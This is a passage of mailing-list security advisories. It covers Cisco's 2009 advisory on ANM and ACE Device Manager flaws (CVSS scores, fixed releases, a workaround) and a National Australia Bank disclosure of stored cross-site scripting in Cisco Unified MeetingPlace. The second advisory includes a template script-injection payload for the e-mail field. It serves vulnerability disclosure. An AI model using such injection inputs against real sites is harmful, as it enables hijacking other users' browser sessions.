files and modify ANM processes including the capability to stop
services. Exploitation of this issue could result in system
information disclosure or denial of services.
This vulnerability is documented in the following Cisco Bug ID:
* CSCsu73001
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0618.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* ACE Device Manager invalid directory permissions (CSCsv66063)
CVSS Base Score - 9.0
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* ANM invalid directory permissions (CSCsv70130)
CVSS Base Score - 9.0
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* ANM default user credentials during installation (CSCsu52724)
CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
* ANM embedded MySQL default credentials (CSCsu52632)
CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
* ANM Java agent privilege escalation (CSCsu73001)
CVSS Base Score - 8.5
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the ACE Device Manager and ANM invalid
directory permission vulnerabilities may allow unauthorized access to
view or modify the ACE Device Manager or ANM file system, including host
operating system files. Modification of some system files could result
in a denial of service condition.
Exploitation of the ANM default user credential and ANM MySQL database
default credential vulnerabilities may allow an attacker to gain
unauthorized system access. Modification of ANM settings with the
default user credentials could result in a denial of service condition.
Unauthorized access to the MySQL database may allow modification of
system files that could impact the function of ANM or allow execution of
commands on the underlying host operating system.
Successful exploitation of the ANM privilege escalation vulnerability
may result in unauthorized remote access to system processes and
services with the ability to modify. Modification of these services
could result in a denial of service condition.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the following software table identifies the earliest
possible software release that contains the fix listed in the "First
Fixed Release" column of the table. The "Recommended Release"
column indicates the release which have fixes for all the published
vulnerabilities at the time of this Advisory.
+---------------------------------------+
| | First | Recommended |
| Vulnerability | Fixed | Release |
| | Release | |
|---------------+---------+-------------|
| ACE Device | | |
| Manager | | |
| Invalid | A3(2.1) | A3(2.1) |
| Directory | | |
| Permissions | | |
|---------------+---------+-------------|
| ANM Invalid | | ANM 2.0 |
| Directory | ANM 2.0 | Update A |
| Permissions | | |
|---------------+---------+-------------|
| ANM Default | | ANM 2.0 |
| User | ANM 2.0 | Update A |
| Credentials | | |
|---------------+---------+-------------|
| ANM MySQL | | ANM 2.0 |
| Default | ANM 2.0 | Update A |
| Credentials | | |
|---------------+---------+-------------|
| ANM Java | ANM 2.0 | |
| Agent | Update | ANM 2.0 |
| Privilege | A | Update A |
| Escalation | | |
+---------------------------------------+
ANM 2.0 Update A can be downloaded from:
http://www.cisco.com/cgi-bin/Software/Tablebuild/doftp.pl?ftpfile=/cisco/crypto/3DES/netmgmt/anm/1.2/anm2.0-update-A.bin
ACE Device Manager A3(2.1) can be downloaded from:
http://www.cisco.com/cgi-bin/Software/Tablebuild/doftp.pl?ftpfile=/cisco/crypto/3DES/ans/DNSS/ace4710/c4710ace-mz.A3_2_1.bin
Workarounds
===========
While this Security Advisory describes multiple distinct
vulnerabilities, a workaround exists for only the following
vulnerability.
ANM Default User Credentials
+---------------------------
The ANM user "admin" account password may be modified after installation
by following the procedures documented for "Changing the Admin Password"
located in the ANM User Guide at:
http://www.cisco.com/en/US/docs/net_mgmt/application_networking_manager/2.0/user/guide/UG_admin.html#wp1053216
Applied Mitigation Bulletin
+--------------------------
Additional mitigation techniques that can be deployed on Cisco devices
within the network are available in the Cisco Applied Mitigation
Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090225-anm.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software
upgrades.
Customers with Service Contracts
- --------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.
Customers using Third Party Support Organizations
- -------------------------------------------------
Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.
Customers without Service Contracts
- -----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
Acknowledgement to the National Australia Bank's Security Assurance team
for the discovery and reporting of the ACE Device Manager directory
permissions vulnerability.
The remaining vulnerabilities were identified through internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090225-anm.shtml
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2009 February 25 | Initial public release |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in
Cisco products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2008 - 2009 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
Updated: Feb 25, 2009 Document ID: 109451
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAkmlezoACgkQ86n/Gc8U/uAexwCfYI7DnCQWq4XF2Id8o6bO4+zJ
a6IAn0r51YyfdsXPFgYII7OPUWLzJHLU
=xUPr
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
Title: Cisco Unified MeetingPlace Web Conferencing Stored Cross Site Scripting Vulnerability
CVE Identifier: N/A
____________
Credit:
Security Assurance Team of the National Australia Bank.
The vendor was advised of this vulnerability prior to its public release. National Australia Bank adheres to the ?Guidelines for Security Vulnerability Reporting and Response V2.0? document when issuing Security Advisories.
Class: Stored Cross Site Scripting
____________
Remote: Yes
____________
Local: No
____________
Vulnerable:
Cisco Unified Meeting Place 6.0 and possibly 7.0 ? other versions may also be vulnerable.
____________
Not Vulnerable:
____________
Vendor: Cisco
____________
Discussion:
Cisco Unified Meeting Place is a suite of products used for remote voice, video and web conferencing. The Cisco Unified Meeting Place web interface allows users to schedule and attend conferences.
Each user has the ability to modify their own account settings such as their name, telephone extension, email address etc. National Australia Bank?s Security Assurance Team have identified a stored cross site scripting vulnerability that could be exploited by a malicious user to execute code within another user's browser when they view a meeting created by the malicious user.
____________
Exploit:
The ?E-mail Address? field of this profile page is vulnerable to stored cross site scripting attacks.
If a user enters the following in the email field, the code within the script tags will be executed whenever that user?s profile data is viewed by other users, including when viewing the details of a meeting created by this user:
"><script>INSERT JAVASCRIPT HERE</script>
Solution:
No workaround available.
This vulnerability is fixed in Cisco Unified MeetingPlace Web Conferencing software version 6.0(517.0) also known as Maintenance Release 4 (MR4) for the 6.0 release, and version 7.0(2) also known as Maintenance Release 1 (MR1) for the 7.0 release.
____________
References:
Vendor Homepage:
http://www.cisco.com
--- End Message ---